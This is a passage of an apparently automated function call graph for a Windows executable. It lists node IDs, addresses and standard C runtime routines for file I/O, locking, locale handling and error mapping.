21455->21457 21459 f66d57 21456->21459 21457->21456 21458 f681d7 ___free_lconv_mon 14 API calls 21457->21458 21458->21456 21462 f61fe0 LeaveCriticalSection 21459->21462 21461 f66d40 21461->21445 21462->21461 21463->21441 21469 f6ceec GetPEB 21464->21469 21467 f65297 GetPEB 21468 f65223 21467->21468 21468->21422 21468->21423 21470 f6cf06 21469->21470 21471 f65292 21469->21471 21473 f68535 21470->21473 21471->21467 21471->21468 21474 f684b2 std::_Lockit::_Lockit 5 API calls 21473->21474 21475 f68551 21474->21475 21475->21471 21477 f67174 ___scrt_uninitialize_crt 21476->21477 21478 f67162 21476->21478 21477->19315 21479 f67170 21478->21479 21481 f62c79 21478->21481 21479->19315 21484 f62b06 21481->21484 21487 f629fa 21484->21487 21488 f62a06 __FrameHandler3::FrameUnwindToState 21487->21488 21495 f61f98 EnterCriticalSection 21488->21495 21490 f62a10 ___scrt_uninitialize_crt 21491 f62a7c 21490->21491 21496 f6296e 21490->21496 21504 f62a9a 21491->21504 21495->21490 21497 f6297a __FrameHandler3::FrameUnwindToState 21496->21497 21507 f5f9e9 EnterCriticalSection 21497->21507 21499 f62984 ___scrt_uninitialize_crt 21503 f629bd 21499->21503 21508 f62c14 21499->21508 21521 f629ee 21503->21521 21553 f61fe0 LeaveCriticalSection 21504->21553 21506 f62a88 21506->21479 21507->21499 21509 f62c29 _Fputc 21508->21509 21510 f62c30 21509->21510 21511 f62c3b 21509->21511 21513 f62b06 ___scrt_uninitialize_crt 71 API calls 21510->21513 21512 f62bab ___scrt_uninitialize_crt 69 API calls 21511->21512 21514 f62c45 21512->21514 21520 f62c36 21513->21520 21516 f68c78 _Ungetc 44 API calls 21514->21516 21514->21520 21515 f5fa59 _Fputc 44 API calls 21517 f62c73 21515->21517 21518 f62c5c 21516->21518 21517->21503 21524 f6bfa3 21518->21524 21520->21515 21552 f5f9fd LeaveCriticalSection 21521->21552 21523 f629dc 21523->21490 21525 f6bfb4 21524->21525 21527 f6bfc1 21524->21527 21526 f61f44 __dosmaperr 14 API calls 21525->21526 21534 f6bfb9 21526->21534 21528 f6c00a 21527->21528 21530 f6bfe8 
21527->21530 21529 f61f44 __dosmaperr 14 API calls 21528->21529 21531 f6c00f 21529->21531 21535 f6bf01 21530->21535 21533 f61e30 _Ungetc 44 API calls 21531->21533 21533->21534 21534->21520 21536 f6bf0d __FrameHandler3::FrameUnwindToState 21535->21536 21548 f70753 EnterCriticalSection 21536->21548 21538 f6bf1c 21540 f709cf __wsopen_s 44 API calls 21538->21540 21547 f6bf61 21538->21547 21539 f61f44 __dosmaperr 14 API calls 21541 f6bf68 21539->21541 21542 f6bf48 FlushFileBuffers 21540->21542 21542->21541 21543 f6bf54 GetLastError 21542->21543 21547->21539 21548->21538 21552->21523 21553->21506 21554 f6b055 21555 f68c78 _Ungetc 44 API calls 21554->21555 21556 f6b062 21555->21556 21557 f6b06e 21556->21557 21560 f6b0ba 21556->21560 21571 f6b3eb 21556->21571 21559 f6b11c 21579 f6b245 21559->21579 21560->21557 21560->21559 21561 f6a443 44 API calls 21560->21561 21563 f6b10f 21561->21563 21563->21559 21566 f6bea5 21563->21566 21567 f6817a __dosmaperr 14 API calls 21566->21567 21568 f6bec2 21567->21568 21569 f681d7 ___free_lconv_mon 14 API calls 21568->21569 21570 f6becc 21569->21570 21570->21559 21572 f6b405 21571->21572 21573 f6b401 21571->21573 21574 f709cf __wsopen_s 44 API calls 21572->21574 21578 f6b454 21572->21578 21573->21560 21575 f6b426 21574->21575 21576 f6b42e SetFilePointerEx 21575->21576 21575->21578 21577 f6b445 GetFileSizeEx 21576->21577 21576->21578 21577->21578 21578->21560 21580 f68c78 _Ungetc 44 API calls 21579->21580 21581 f6b254 21580->21581 21582 f6b267 21581->21582 21583 f6b2fa 21581->21583 21585 f6b284 21582->21585 21588 f6b2ab 21582->21588 21584 f6ad4d __wsopen_s 69 API calls 21583->21584 21587 f6b12d 21584->21587 21586 f6ad4d __wsopen_s 69 API calls 21585->21586 21586->21587 21588->21587 21590 f6c7f5 21588->21590 21591 f6c809 _Fputc 21590->21591 21596 f6c64c 21591->21596 21594 f5fa59 _Fputc 44 API calls 21595 f6c82d 21594->21595 21595->21587 21599 f6c658 __FrameHandler3::FrameUnwindToState 21596->21599 21597 f6c660 21597->21594 21598 f6c736 21600 
f61db3 _Fputc 44 API calls 21598->21600 21599->21597 21599->21598 21601 f6c6b4 21599->21601 21600->21597 21607 f70753 EnterCriticalSection 21601->21607 21603 f6c6ba 21604 f6c6df 21603->21604 21608 f6c772 21603->21608 21614 f6c72e 21604->21614 21607->21603 21609 f709cf __wsopen_s 44 API calls 21608->21609 21610 f6c784 21609->21610 21611 f6c7a0 SetFilePointerEx 21610->21611 21612 f6c78c __wsopen_s 21610->21612 21611->21612 21613 f6c7b8 GetLastError 21611->21613 21612->21604 21613->21612 21617 f70808 LeaveCriticalSection 21614->21617 21616 f6c734 21616->21597 21617->21616 22624 f59856 22625 f5985d 22624->22625 22626 f59862 22624->22626 22628 f5f9e9 EnterCriticalSection 22625->22628 22628->22626 24489 f62e2a 24490 f62e35 24489->24490 24491 f62e4a 24489->24491 24492 f61f44 __dosmaperr 14 API calls 24490->24492 24493 f62e67 24491->24493 24494 f62e52 24491->24494 24495 f62e3a 24492->24495 24503 f6c60b 24493->24503 24496 f61f44 __dosmaperr 14 API calls 24494->24496 24498 f61e30 _Ungetc 44 API calls 24495->24498 24499 f62e57 24496->24499 24501 f62e45 24498->24501 24502 f61e30 _Ungetc 44 API calls 24499->24502 24500 f62e62 24502->24500 24504 f6c61f _Fputc 24503->24504 24509 f6c020 24504->24509 24507 f5fa59 _Fputc 44 API calls 24508 f6c639 24507->24508 24508->24500 24510 f6c02c __FrameHandler3::FrameUnwindToState 24509->24510 24511 f6c056 24510->24511 24512 f6c033 24510->24512 24520 f5f9e9 EnterCriticalSection 24511->24520 24513 f61db3 _Fputc 44 API calls 24512->24513 24515 f6c04c 24513->24515 24515->24507 24516 f6c064 24521 f6c0af 24516->24521 24518 f6c073 24534 f6c0a5 24518->24534 24520->24516 24522 f6c0e6 24521->24522 24523 f6c0be 24521->24523 24525 f68c78 _Ungetc 44 API calls 24522->24525 24524 f61db3 _Fputc 44 API calls 24523->24524 24533 f6c0d9 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 24524->24533 24526 f6c0ef 24525->24526 24537 f6c835 24526->24537 24529 f6c199 24540 f6c40f 24529->24540 24531 f6c1b0 24531->24533 24552 f6c250 24531->24552 24533->24518 24559 f5f9fd 
LeaveCriticalSection 24534->24559 24536 f6c0ad 24536->24515 24538 f6c64c 48 API calls 24537->24538 24539 f6c10d 24538->24539 24539->24529 24539->24531 24539->24533 24541 f6c41e __wsopen_s 24540->24541 24542 f68c78 _Ungetc 44 API calls 24541->24542 24544 f6c43a __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 24542->24544 24543 f5aff0 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 24545 f6c5b8 24543->24545 24546 f6c835 48 API calls 24544->24546 24548 f6c446 24544->24548 24545->24533 24547 f6c49a 24546->24547 24547->24548 24549 f6c4cc ReadFile 24547->24549 24548->24543 24549->24548 24550 f6c4f3 24549->24550 24551 f6c835 48 API calls 24550->24551 24551->24548 24553 f68c78 _Ungetc 44 API calls 24552->24553 24554 f6c263 24553->24554 24555 f6c835 48 API calls 24554->24555 24558 f6c2ab __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 24554->24558 24556 f6c2fe 24555->24556 24557 f6c835 48 API calls 24556->24557 24556->24558 24557->24558 24558->24533 24559->24536 22712 f52c1c 22713 f52c26 22712->22713 22714 f52c3a 22713->22714 22727 f51390 22713->22727 22738 f529e0 22714->22738 22728 f513a0 22727->22728 22744 f58257 22728->22744 22730 f513a6 22731 f52c70 22730->22731 22732 f52c94 22731->22732 22733 f5b1e3 codecvt 16 API calls 22732->22733 22734 f52c9b 22733->22734 22735 f52d43 codecvt 22734->22735 22736 f61e40 std::ios_base::_Init 44 API calls 22734->22736 22735->22714 22737 f52d5e 22736->22737 22739 f529e8 22738->22739 22805 f513b0 22739->22805 22752 f5c0ba 22744->22752 22747 f582dd 22748 f61e91 ___std_exception_copy 15 API calls 22747->22748 22751 f582d9 shared_ptr 22748->22751 22749 f582d0 22755 f57d27 22749->22755 22751->22730 22758 f5e4ac 22752->22758 22754 f58281 22754->22747 22754->22749 22754->22751 22756 f61e91 ___std_exception_copy 15 API calls 22755->22756 22757 f57d70 shared_ptr 22756->22757 22757->22751 22786 f5e4ba 22758->22786 22760 f5e4b1 22760->22754 22761 f67a10 std::locale::_Setgloballocale 2 API calls 22760->22761 22762 f5f7b8 22761->22762 
22763 f5f7c3 22762->22763 22764 f67a55 std::locale::_Setgloballocale 44 API calls 22762->22764 22765 f5f7cd IsProcessorFeaturePresent 22763->22765 22766 f5f7ec 22763->22766 22764->22763 22767 f5f7d9 22765->22767 22768 f6535e std::locale::_Setgloballocale 23 API calls 22766->22768 22769 f61c34 std::locale::_Setgloballocale 8 API calls 22767->22769 22770 f5f7f6 __FrameHandler3::FrameUnwindToState 22768->22770 22769->22766 22771 f5f80a 22770->22771 22774 f5f82a 22770->22774 22772 f61f44 __dosmaperr 14 API calls 22771->22772 22773 f5f80f 22772->22773 22775 f61e30 _Ungetc 44 API calls 22773->22775 22776 f5f83c 22774->22776 22777 f5f82f 22774->22777 22779 f5f81a 22775->22779 22778 f67c48 17 API calls 22776->22778 22780 f61f44 __dosmaperr 14 API calls 22777->22780 22781 f5f845 22778->22781 22779->22754 22780->22779 22782 f5f84c 22781->22782 22783 f5f859 22781->22783 22784 f61f44 __dosmaperr 14 API calls 22782->22784 22785 f5f897 LeaveCriticalSection 22783->22785 22784->22779 22785->22779 22787 f5e4c6 GetLastError 22786->22787 22788 f5e4c3 22786->22788 22800 f5f673 22787->22800 22788->22760 22791 f5e540 SetLastError 22791->22760 22792 f5f6ae ___vcrt_FlsSetValue 6 API calls 22793 f5e4f4 __Getctype 22792->22793 22794 f5e51c 22793->22794 22796 f5f6ae ___vcrt_FlsSetValue 6 API calls 22793->22796 22799 f5e4fa 22793->22799 22795 f5f6ae ___vcrt_FlsSetValue 6 API calls 22794->22795 22797 f5e530 22794->22797 22795->22797 22796->22794 22798 f61bf0 std::locale::_Locimp::~_Locimp 14 API calls 22797->22798 22798->22799 22799->22791 22801 f5f512 ___vcrt_FlsGetValue 5 API calls 22800->22801 22802 f5f68d 22801->22802 22803 f5f6a5 TlsGetValue 22802->22803 22804 f5e4db 22802->22804 22803->22804 22804->22791 22804->22792 22804->22799 22808 f58342 22805->22808 22809 f5835d __InternalCxxFrameHandler 22808->22809 22816 f58373 22808->22816 22812 f5c0d1 CallUnexpected RaiseException 22809->22812 22810 f583e4 RaiseException 22811 f5aff0 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 
API calls 22810->22811 22813 f513ba 22811->22813 22812->22816 22814 f58406 22815 f5f7b3 __purecall 44 API calls 22814->22815 22817 f5840b 22815->22817 22816->22810 22816->22814 22818 f583c4 __alloca_probe_16 22816->22818 22818->22810 24639 f59ff1 24640 f59ffd __EH_prolog3_GS 24639->24640 24642 f5a04c 24640->24642 24646 f5a014 24640->24646 24649 f5a066 24640->24649 24641 f5b4a9 5 API calls 24643 f5a130 24641->24643 24653 f590a8 24642->24653 24646->24641 24648 f556e0 44 API calls 24648->24646 24650 f5a115 24649->24650 24651 f5a150 24649->24651 24656 f59d8a 24649->24656 24660 f62d1e 24649->24660 24650->24648 24651->24650 24680 f634cc 24651->24680 24693 f6240b 24653->24693 24657 f59d96 24656->24657 24658 f59db1 24656->24658 24657->24649 24777 f590ec 24658->24777 24661 f62d2a __FrameHandler3::FrameUnwindToState 24660->24661 24662 f62d34 24661->24662 24663 f62d4c 24661->24663 24665 f61f44 __dosmaperr 14 API calls 24662->24665 24794 f5f9e9 EnterCriticalSection 24663->24794 24667 f62d39 24665->24667 24666 f62d56 24668 f62df2 24666->24668 24670 f68c78 _Ungetc 44 API calls 24666->24670 24669 f61e30 _Ungetc 44 API calls 24667->24669 24795 f62cd7 24668->24795 24672 f62d44 24669->24672 24675 f62d73 24670->24675 24672->24649 24673 f62df8 24802 f62e22 24673->24802 24675->24668 24676 f62dca 24675->24676 24677 f61f44 __dosmaperr 14 API calls 24676->24677 24678 f62dcf 24677->24678 24679 f61e30 _Ungetc 44 API calls 24678->24679 24679->24672 24681 f634d8 __FrameHandler3::FrameUnwindToState 24680->24681 24682 f634f4 24681->24682 24683 f634df 24681->24683 24806 f5f9e9 EnterCriticalSection 24682->24806 24684 f61f44 __dosmaperr 14 API calls 24683->24684 24686 f634e4 24684->24686 24688 f61e30 _Ungetc 44 API calls 24686->24688 24687 f634fe 24807 f633d3 24687->24807 24691 f634ef 24688->24691 24691->24651 24694 f62417 __FrameHandler3::FrameUnwindToState 24693->24694 24695 f62435 24694->24695 24696 f6241e 24694->24696 24706 f5f9e9 EnterCriticalSection 24695->24706 24697 f61f44 __dosmaperr 14 
API calls 24696->24697 24699 f62423 24697->24699 24701 f61e30 _Ungetc 44 API calls 24699->24701 24700 f62441 24707 f6229b 24700->24707 24703 f590b3 24701->24703 24703->24646 24704 f6244c 24741 f6247a 24704->24741 24706->24700 24708 f6231e 24707->24708 24709 f622b8 24707->24709 24712 f68c78 _Ungetc 44 API calls 24708->24712 24730 f62315 24708->24730 24710 f68c78 _Ungetc 44 API calls 24709->24710 24711 f622be 24710->24711 24713 f622e1 24711->24713 24715 f68c78 _Ungetc 44 API calls 24711->24715 24714 f62333 24712->24714 24713->24708 24724 f622fc 24713->24724 24717 f68c78 _Ungetc 44 API calls 24714->24717 24732 f62356 24714->24732 24716 f622ca 24715->24716 24716->24713 24722 f68c78 _Ungetc 44 API calls 24716->24722 24718 f6233f 24717->24718 24723 f68c78 _Ungetc 44 API calls 24718->24723 24718->24732 24719 f62d13 44 API calls 24721 f62376 24719->24721 24728 f6356c __Getctype 44 API calls 24721->24728 24721->24730 24725 f622d6 24722->24725 24727 f6234b 24723->24727 24724->24730 24744 f62d13 24724->24744 24726 f68c78 _Ungetc 44 API calls 24725->24726 24726->24713 24729 f68c78 _Ungetc 44 API calls 24727->24729 24731 f6238e 24728->24731 24729->24732 24730->24704 24733 f623b8 24731->24733 24735 f62d13 44 API calls 24731->24735 24732->24719 24732->24730 24751 f6a3f7 24733->24751 24736 f6239f 24735->24736 24736->24733 24738 f623a5 24736->24738 24739 f634cc 44 API calls 24738->24739 24739->24730 24740 f61f44 __dosmaperr 14 API calls 24740->24730 24776 f5f9fd LeaveCriticalSection 24741->24776 24743 f62480 24743->24703 24745 f62cd7 24744->24745 24746 f61f44 __dosmaperr 14 API calls 24745->24746 24748 f62cf8 24745->24748 24747 f62ce8 24746->24747 24749 f61e30 _Ungetc 44 API calls 24747->24749 24748->24724 24750 f62cf3 24749->24750 24750->24724 24752 f6a40a _Fputc 24751->24752 24757 f6a2c4 24752->24757 24755 f5fa59 _Fputc 44 API calls 24756 f623cc 24755->24756 24756->24730 24756->24740 24758 f6a2d8 24757->24758 24767 f6a2e8 24757->24767 24759 f6a30d 24758->24759 24760 f615b0 _Fputc 
44 API calls 24758->24760 24758->24767 24761 f6a341 24759->24761 24762 f6a31e 24759->24762 24760->24759 24764 f6a3bd 24761->24764 24765 f6a369 24761->24765 24761->24767 24769 f75822 24762->24769 24766 f6edaf __wsopen_s MultiByteToWideChar 24764->24766 24765->24767 24768 f6edaf __wsopen_s MultiByteToWideChar 24765->24768 24766->24767 24767->24755 24768->24767 24772 f77d73 24769->24772 24775 f77d9e _Fputc 24772->24775 24773 f5aff0 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 24774 f7583d 24773->24774 24774->24767 24775->24773 24776->24743 24778 f59187 24777->24778 24779 f5910b 24777->24779 24780 f51440 std::ios_base::_Init 46 API calls 24778->24780 24784 f568c0 24779->24784 24781 f5918c 24780->24781 24783 f59127 codecvt 24783->24657 24785 f568cb 24784->24785 24789 f568dc 24784->24789 24786 f568d6 24785->24786 24787 f513c0 codecvt 24785->24787 24788 f5b1e3 codecvt 16 API calls 24786->24788 24790 f5c0d1 CallUnexpected RaiseException 24787->24790 24788->24789 24789->24783 24791 f513da 24790->24791 24792 f5be7b ___std_exception_copy 45 API calls 24791->24792 24793 f51401 24792->24793 24793->24783 24794->24666 24796 f62ce3 24795->24796 24799 f62cf8 24795->24799 24797 f61f44 __dosmaperr 14 API calls 24796->24797 24798 f62ce8 24797->24798 24800 f61e30 _Ungetc 44 API calls 24798->24800 24799->24673 24801 f62cf3 24800->24801 24801->24673 24805 f5f9fd LeaveCriticalSection 24802->24805 24804 f62e28 24804->24672 24805->24804 24806->24687 24808 f633eb 24807->24808 24810 f6345b 24807->24810 24809 f68c78 _Ungetc 44 API calls 24808->24809 24814 f633f1 24809->24814 24811 f63453 24810->24811 24812 f6bea5 _Ungetc 14 API calls 24810->24812 24818 f63537 24811->24818 24812->24811 24813 f63443 24815 f61f44 __dosmaperr 14 API calls 24813->24815 24814->24810 24814->24813 24816 f63448 24815->24816 24817 f61e30 _Ungetc 44 API calls 24816->24817 24817->24811 24821 f5f9fd LeaveCriticalSection 24818->24821 24820 f6353d 24820->24691 24821->24820 24866 f59be0 24870 f59c05 
24866->24870 24871 f59c01 24866->24871 24867 f5aff0 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 24868 f59c6d 24867->24868 24870->24871 24872 f59cbb 24870->24872 24873 f59c49 24870->24873 24871->24867 24872->24871 24874 f61bb6 70 API calls 24872->24874 24873->24871 24875 f590cf 24873->24875 24874->24871 24878 f6267e 24875->24878 24879 f62691 _Fputc 24878->24879 24884 f62482 24879->24884 24882 f5fa59 _Fputc 44 API calls 24883 f590dd 24882->24883 24883->24871 24885 f6248e __FrameHandler3::FrameUnwindToState 24884->24885 24886 f62495 24885->24886 24887 f624ba 24885->24887 24889 f61db3 _Fputc 44 API calls 24886->24889 24895 f5f9e9 EnterCriticalSection 24887->24895 24891 f624b0 24889->24891 24890 f624c9 24896 f62546 24890->24896 24891->24882 24895->24890 24897 f6257d 24896->24897 24898 f6256b _Fputc 24896->24898 24899 f68c78 _Ungetc 44 API calls 24897->24899 24901 f5aff0 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 24898->24901 24900 f62584 24899->24900 24902 f68c78 _Ungetc 44 API calls 24900->24902 24904 f625ac 24900->24904 24903 f624da 24901->24903 24905 f62595 24902->24905 24918 f6250a 24903->24918 24904->24898 24907 f68c78 _Ungetc 44 API calls 24904->24907 24905->24904 24906 f68c78 _Ungetc 44 API calls 24905->24906 24908 f625a1 24906->24908 24909 f625df 24907->24909 24910 f68c78 _Ungetc 44 API calls 24908->24910 24911 f62602 24909->24911 24912 f68c78 _Ungetc 44 API calls 24909->24912 24910->24904 24911->24898 24913 f6a120 _Fputc 46 API calls 24911->24913 24914 f625eb 24912->24914 24913->24898 24914->24911 24915 f68c78 _Ungetc 44 API calls 24914->24915 24916 f625f7 24915->24916 24917 f68c78 _Ungetc 44 API calls 24916->24917 24917->24911 24921 f5f9fd LeaveCriticalSection 24918->24921 24920 f62510 24920->24891 24921->24920 24926 f68bec 24927 f68bf8 __FrameHandler3::FrameUnwindToState 24926->24927 24938 f61f98 EnterCriticalSection 24927->24938 24929 f68bff 24939 f706b5 24929->24939 24931 f68c1d 24963 f68c43 
24931->24963 24938->24929 24940 f706c1 __FrameHandler3::FrameUnwindToState 24939->24940 24941 f706eb 24940->24941 24942 f706ca 24940->24942 24966 f61f98 EnterCriticalSection 24941->24966 24944 f61f44 __dosmaperr 14 API calls 24942->24944 24945 f706cf 24944->24945 24946 f61e30 _Ungetc 44 API calls 24945->24946 24947 f68c0e 24946->24947 24947->24931 24952 f68a86 GetStartupInfoW 24947->24952 24948 f70723 24967 f7074a 24948->24967 24949 f706f7 24949->24948 24951 f70605 __wsopen_s 15 API calls 24949->24951 24951->24949 24953 f68aa3 24952->24953 24955 f68b37 24952->24955 24954 f706b5 44 API calls 24953->24954 24953->24955 24956 f68acb 24954->24956 24958 f68b3c 24955->24958 24956->24955 24957 f68afb GetFileType 24956->24957 24957->24956 24959 f68b43 24958->24959 24960 f68b86 GetStdHandle 24959->24960 24961 f68be8 24959->24961 24962 f68b99 GetFileType 24959->24962 24960->24959 24961->24931 24962->24959 24971 f61fe0 LeaveCriticalSection 24963->24971 24965 f68c2e 24966->24949 24970 f61fe0 LeaveCriticalSection 24967->24970 24969 f70751 24969->24947 24970->24969 24971->24965 21630 f67fd8 21635 f67dae 21630->21635 21632 f68017 21636 f67dcd 21635->21636 21637 f67de0 21636->21637 21645 f67df5 21636->21645 21638 f61f44 __dosmaperr 14 API calls 21637->21638 21639 f67de5 21638->21639 21640 f61e30 _Ungetc 44 API calls 21639->21640 21641 f67df0 21640->21641 21641->21632 21652 f73c2c 21641->21652 21642 f61f44 __dosmaperr 14 API calls 21643 f67fc6 21642->21643 21644 f61e30 _Ungetc 44 API calls 21643->21644 21644->21641 21650 f67f15 21645->21650 21655 f734be 21645->21655 21647 f67f65 21648 f734be 44 API calls 21647->21648 21647->21650 21649 f67f83 21648->21649 21649->21650 21651 f734be 44 API calls 21649->21651 21650->21641 21650->21642 21651->21650 21687 f735f6 21652->21687 21656 f73515 21655->21656 21657 f734cd 21655->21657 21669 f7352b 21656->21669 21659 f734d3 21657->21659 21661 f734f0 21657->21661 21660 f61f44 __dosmaperr 14 API calls 21659->21660 21663 f734d8 21660->21663 21665 
f61f44 __dosmaperr 14 API calls 21661->21665 21668 f7350e 21661->21668 21662 f734e3 21662->21647 21664 f61e30 _Ungetc 44 API calls 21663->21664 21664->21662 21666 f734ff 21665->21666 21667 f61e30 _Ungetc 44 API calls 21666->21667 21667->21662 21668->21647 21670 f73555 21669->21670 21671 f7353b 21669->21671 21673 f73574 21670->21673 21674 f7355d 21670->21674 21672 f61f44 __dosmaperr 14 API calls 21671->21672 21677 f73540 21672->21677 21675 f73597 21673->21675 21676 f73580 21673->21676 21678 f61f44 __dosmaperr 14 API calls 21674->21678 21683 f63abd __wsopen_s 44 API calls 21675->21683 21686 f7354b 21675->21686 21679 f61f44 __dosmaperr 14 API calls 21676->21679 21680 f61e30 _Ungetc 44 API calls 21677->21680 21681 f73562 21678->21681 21682 f73585 21679->21682 21680->21686 21684 f61e30 _Ungetc 44 API calls 21681->21684 21685 f61e30 _Ungetc 44 API calls 21682->21685 21683->21686 21684->21686 21685->21686 21686->21662 21690 f73602 __FrameHandler3::FrameUnwindToState 21687->21690 21688 f73609 21689 f61f44 __dosmaperr 14 API calls 21688->21689 21691 f7360e 21689->21691 21690->21688 21692 f73634 21690->21692 21693 f61e30 _Ungetc 44 API calls 21691->21693 21698 f73bbe 21692->21698 21697 f73618 21693->21697 21697->21632 21711 f6f094 21698->21711 21703 f73bf4 21705 f681d7 ___free_lconv_mon 14 API calls 21703->21705 21706 f73658 21703->21706 21705->21706 21707 f7368b 21706->21707 21708 f736b5 21707->21708 21709 f73691 21707->21709 21708->21697 22105 f70808 LeaveCriticalSection 21709->22105 21712 f63abd __wsopen_s 44 API calls 21711->21712 21713 f6f0a6 21712->21713 21714 f6f0b8 21713->21714 21765 f68575 21713->21765 21716 f6474b 21714->21716 21768 f645d7 21716->21768 21719 f73c4c 21720 f73c69 21719->21720 21721 f73c97 21720->21721 21722 f73c7e 21720->21722 21803 f7082b 21721->21803 21724 f61f31 __dosmaperr 14 API calls 21722->21724 21726 f73c83 21724->21726 21729 f61f44 __dosmaperr 14 API calls 21726->21729 21727 f73ca5 21730 f61f31 __dosmaperr 14 API calls 21727->21730 21728 
f73cbc 21816 f73905 CreateFileW 21728->21816 21732 f73c90 21729->21732 21733 f73caa 21730->21733 21732->21703 21734 f61f44 __dosmaperr 14 API calls 21733->21734 21734->21726 21735 f73d72 GetFileType 21736 f73dc4 21735->21736 21737 f73d7d GetLastError 21735->21737 21818 f70776 21736->21818 21741 f61eea __dosmaperr 14 API calls 21737->21741 21738 f73d47 GetLastError 21740 f61eea __dosmaperr 14 API calls 21738->21740 21739 f73cf5 21739->21735 21739->21738 21817 f73905 CreateFileW 21739->21817 21740->21726 21743 f73d8b CloseHandle 21741->21743 21743->21726 21746 f73db4 21743->21746 21745 f73d3a 21745->21735 21745->21738 21748 f61f44 __dosmaperr 14 API calls 21746->21748 21750 f73db9 21748->21750 21749 f73e31 21754 f73e38 21749->21754 21848 f736b7 21749->21848 21750->21726 21842 f68dd3 21754->21842 21755 f73e74 21755->21732 21757 f73ef0 CloseHandle 21755->21757 21875 f73905 CreateFileW 21757->21875 21759 f73f1b 21760 f73f51 21759->21760 21761 f73f25 GetLastError 21759->21761 21760->21732 21762 f61eea __dosmaperr 14 API calls 21761->21762 21763 f73f31 21762->21763 21764 f7093e __wsopen_s 15 API calls 21763->21764 21764->21760 21766 f682c9 std::_Lockit::_Lockit 5 API calls 21765->21766 21767 f6857d 21766->21767 21767->21714 21769 f645e5 21768->21769 21770 f645ff 21768->21770 21786 f6478c 21769->21786 21772 f64606 21770->21772 21773 f64625 21770->21773 21778 f645ef 21772->21778 21790 f647cd 21772->21790 21774 f6edaf __wsopen_s MultiByteToWideChar 21773->21774 21775 f64634 21774->21775 21777 f6463b GetLastError 21775->21777 21780 f64661 21775->21780 21782 f647cd __wsopen_s 15 API calls 21775->21782 21795 f61eea 21777->21795 21778->21703 21778->21719 21780->21778 21783 f6edaf __wsopen_s MultiByteToWideChar 21780->21783 21782->21780 21785 f64678 21783->21785 21784 f61f44 __dosmaperr 14 API calls 21784->21778 21785->21777 21785->21778 21787 f64797 21786->21787 21788 f6479f 21786->21788 21789 f681d7 ___free_lconv_mon 14 API calls 21787->21789 21788->21778 21789->21788 21791 
f6478c __wsopen_s 14 API calls 21790->21791 21792 f647db 21791->21792 21800 f6480c 21792->21800 21796 f61f31 __dosmaperr 14 API calls 21795->21796 21797 f61ef5 __dosmaperr 21796->21797 21798 f61f44 __dosmaperr 14 API calls 21797->21798 21799 f61f08 21798->21799 21799->21784 21801 f694cc std::_Locinfo::_Locinfo_ctor 15 API calls 21800->21801 21802 f647ec 21801->21802 21802->21778 21804 f70837 __FrameHandler3::FrameUnwindToState 21803->21804 21876 f61f98 EnterCriticalSection 21804->21876 21806 f7083e 21808 f70863 21806->21808 21812 f708d2 EnterCriticalSection 21806->21812 21814 f70885 21806->21814 21880 f70605 21808->21880 21812->21814 21815 f708df LeaveCriticalSection 21812->21815 21877 f70935 21814->21877 21815->21806 21816->21739 21817->21745 21819 f70785 21818->21819 21820 f707ee 21818->21820 21819->21820 21826 f707ab __wsopen_s 21819->21826 21821 f61f44 __dosmaperr 14 API calls 21820->21821 21822 f707f3 21821->21822 21823 f61f31 __dosmaperr 14 API calls 21822->21823 21824 f707db 21823->21824 21824->21749 21827 f73b14 21824->21827 21825 f707d5 SetStdHandle 21825->21824 21826->21824 21826->21825 21828 f73b6e 21827->21828 21829 f73b3c 21827->21829 21828->21749 21829->21828 21889 f6c853 21829->21889 21832 f73b72 21895 f75fcf 21832->21895 21833 f73b5c 21834 f61f31 __dosmaperr 14 API calls 21833->21834 21836 f73b61 21834->21836 21836->21828 21840 f61f44 __dosmaperr 14 API calls 21836->21840 21837 f73b84 21838 f73b9a 21837->21838 21958 f7787e 21837->21958 21838->21836 21839 f6c853 __wsopen_s 46 API calls 21838->21839 21839->21836 21840->21828 21843 f68de6 _Fputc 21842->21843 21844 f68e03 __wsopen_s 47 API calls 21843->21844 21845 f68df2 21844->21845 21846 f5fa59 _Fputc 44 API calls 21845->21846 21847 f68dfe 21846->21847 21847->21732 21849 f737cb 21848->21849 21850 f736e8 21848->21850 21849->21754 21849->21755 21858 f73708 21850->21858 22092 f653b0 21850->22092 21852 f736ff 21853 f738fa 21852->21853 21852->21858 21854 f61e5d __Getctype 11 API calls 21853->21854 21855 
f73904 21854->21855 21856 f737f1 21856->21849 21857 f75fcf __wsopen_s 56 API calls 21856->21857 21862 f737fb 21856->21862 21863 f73823 21857->21863 21858->21849 21858->21856 21859 f6c853 __wsopen_s 46 API calls 21858->21859 21861 f737c2 21858->21861 21860 f737db 21859->21860 21860->21861 21867 f737e6 21860->21867 21861->21849 21861->21862 22099 f6ad16 21861->22099 21862->21849 21869 f61f44 __dosmaperr 14 API calls 21862->21869 21863->21849 21863->21862 21864 f7388e 21863->21864 21865 f7385b 21863->21865 21866 f73868 21863->21866 21873 f6c853 __wsopen_s 46 API calls 21864->21873 21870 f61f44 __dosmaperr 14 API calls 21865->21870 21866->21864 21872 f73870 21866->21872 21871 f6c853 __wsopen_s 46 API calls 21867->21871 21869->21849 21870->21862 21871->21856 21874 f6c853 __wsopen_s 46 API calls 21872->21874 21873->21862 21874->21862 21875->21759 21876->21806 21888 f61fe0 LeaveCriticalSection 21877->21888 21879 f708a5 21879->21727 21879->21728 21881 f6817a __dosmaperr 14 API calls 21880->21881 21884 f70617 21881->21884 21882 f70624 21883 f681d7 ___free_lconv_mon 14 API calls 21882->21883 21885 f70679 21883->21885 21884->21882 21886 f687bf __wsopen_s 6 API calls 21884->21886 21885->21814 21887 f70753 EnterCriticalSection 21885->21887 21886->21884 21887->21814 21888->21879 21890 f6c867 _Fputc 21889->21890 21891 f6c772 __wsopen_s 46 API calls 21890->21891 21892 f6c87c 21891->21892 21893 f5fa59 _Fputc 44 API calls 21892->21893 21894 f6c88b 21893->21894 21894->21832 21894->21833 21896 f75fe1 21895->21896 21897 